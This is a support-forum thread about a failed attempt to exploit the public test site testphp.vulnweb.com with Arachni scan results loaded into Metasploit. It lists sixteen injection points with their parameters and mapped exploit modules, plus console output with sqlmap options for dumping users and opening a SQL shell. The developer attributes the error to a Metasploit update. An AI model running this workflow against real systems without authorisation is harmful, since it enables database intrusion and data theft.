WebApp exploitation with Arachni and Metasploit
Hello Tasos,
I have a problem about exploitation with Arachni and Metasploit and need your kind help. Thank you in advance.
I scanned this testing web app, http://testphp.vulnweb.com, using Arachni and generated Metareport. Then I tried to load metareport into Metaspoit and exploit the vulnerabilities found and reported by Arachni.
I did manual exploit using this command arachni_manual
vuln_id
following instructions in this example: https://github.com/Arachni/arachni/blob/master/EXPLOITATION.md.
However, when I run exploit
it said [-] Exploit
failed: A payload has not been selected.
Below is detailed infomation:
Vulnerabilities
ID Host Path Name Method Params Exploit
-- ---- ---- ---- ------ ------ -------
1 176.28.50.165 /listproducts.php SQL Injection GET {"cat"=>"1XXinjectionXX"} unix/webapp/arachni_sqlmap
2 176.28.50.165 /search.php SQL Injection GET {"test"=>"queryXXinjectionXX"} unix/webapp/arachni_sqlmap
3 176.28.50.165 /artists.php SQL Injection GET {"artist"=>"1XXinjectionXX"} unix/webapp/arachni_sqlmap
4 176.28.50.165 /product.php SQL Injection GET {"pic"=>"1XXinjectionXX"} unix/webapp/arachni_sqlmap
5 176.28.50.165 /listproducts.php SQL Injection GET {"artist"=>"1XXinjectionXX"} unix/webapp/arachni_sqlmap
6 176.28.50.165 /secured/newuser.php SQL Injection POST {"uuname"=>"arachni_nameXXinjectionXX", "upass"=>"5543!%arachni_secret", "upass2"=>"5543!%arachni_secret", "urname"=>"arachni_name", "ucc"=>"1", "uemail"=>"[email blocked]", "uphone"=>"1", "signup"=>"signup", "uaddress"=>"1"} unix/webapp/arachni_sqlmap
7 176.28.50.165 /search.php Blind SQL Injection (timing attack) POST {"searchFor"=>"XXinjectionXX", "goButton"=>"go"} unix/webapp/arachni_sqlmap
8 176.28.50.165 /product.php Code injection (timing attack) GET {"pic"=>"XXinjectionXX"} unix/webapp/arachni_php_eval
9 176.28.50.165 /artists.php Code injection (timing attack) GET {"artist"=>"XXinjectionXX"} unix/webapp/arachni_php_eval
10 176.28.50.165 /listproducts.php Code injection (timing attack) GET {"cat"=>"XXinjectionXX"} unix/webapp/arachni_php_eval
11 176.28.50.165 /listproducts.php Code injection (timing attack) GET {"artist"=>"XXinjectionXX"} unix/webapp/arachni_php_eval
12 176.28.50.165 /index.php Blind SQL Injection (timing attack) HEADER {"Accept-Encoding"=>"XXinjectionXX"} unix/webapp/arachni_sqlmap
13 176.28.50.165 /index.php Blind SQL Injection (timing attack) HEADER {"User-Agent"=>"XXinjectionXX"} unix/webapp/arachni_sqlmap
14 176.28.50.165 /userinfo.php Blind SQL Injection (timing attack) POST {"uname"=>"XXinjectionXX", "pass"=>"5543!%arachni_secret"} unix/webapp/arachni_sqlmap
15 176.28.50.165 /userinfo.php Blind SQL Injection (timing attack) POST {"uname"=>"arachni_name", "pass"=>"XXinjectionXX"} unix/webapp/arachni_sqlmap
16 176.28.50.165 /showimage.php Path Traversal GET {"file"=>"XXinjectionXX"} unix/webapp/arachni_path_traversal
Command msf > arachni_manual 5
[*] Using unix/webapp/arachni_sqlmap .
[*] Preparing datastore for 'SQL Injection' vulnerability @ 176.28.50.165/listproducts.php ...
SRVHOST => 127.0.0.1
SRVPORT => 14248
RHOST => 176.28.50.165
RPORT => 80
LHOST => 127.0.0.1
LPORT => 10421
SSL => false
GET => artist=1XXinjectionXX
METHOD => GET
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.1.3
PATH => /listproducts.php
[*] Done!
[-] Unknown variable
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore
Command msf exploit(arachni_sqlmap) > show
options
Module options (exploit/unix/webapp/arachni_sqlmap):
Name Current Setting Required Description
COOKIES no
GET id=1 no HTTP GET query
METHOD GET yes HTTP Method
OPTS --users --dbs --sql-shell -v 0 no The sqlmap options to use
PATH /listproducts.php yes The path to test for SQL injection
POST no The data string to be sent through POST
Proxies no Use a proxy chain
RHOST 176.28.50.165 yes The target address
RPORT 80 yes The target port
SQLMAP_PATH /home/nopsec/sqlmap/sqlmap.py yes The sqlmap 0.9 full path
VHOST no HTTP server virtual host
Then I set SQLMAP_PATH to the corrent full path of sqlmap and run
exploit
it gave the errror asking me to select a
payload. But there is no compatible payload. Run show
payloads
returned nothing.Any idea on how to set payload?
Comments are currently closed for this discussion. You can start a new one.
Keyboard shortcuts
Generic
? | Show this help |
---|---|
ESC | Blurs the current field |
Comment Form
r | Focus the comment reply box |
---|---|
^ + ↩ | Submit the comment |
You can use Command ⌘
instead of Control ^
on Mac
Support Staff 1 Posted by Tasos Laskos on 13 Feb, 2013 02:26 AM
I think there was an MSF update which requires all exploit modules to have a payload.
I'll have to update the sqlmap module to be an auxiliary one.
2 Posted by Yanjin Ding on 13 Feb, 2013 02:53 PM
That's awesome. Please let me know when you're done. Thank you!
Support Staff 3 Posted by Tasos Laskos on 15 Feb, 2013 06:47 PM
Was planning to take care of this sooner but it'll have to wait until sometime during this 3-day weekend because I've been busy working on the web interface.
FYI: I usually try to be on top of support requests and bugfixes but the Metasploit integration stuff aren't really supported so they get a lower priority.
Updating the relevant file to reflect that now.
Support Staff 4 Posted by Tasos Laskos on 23 Feb, 2013 02:47 PM
Sorry I left you waiting, I just pushed the fix to the experimental branch.
Let me know if you come across any issues.
Tasos Laskos closed this discussion on 23 Feb, 2013 02:47 PM.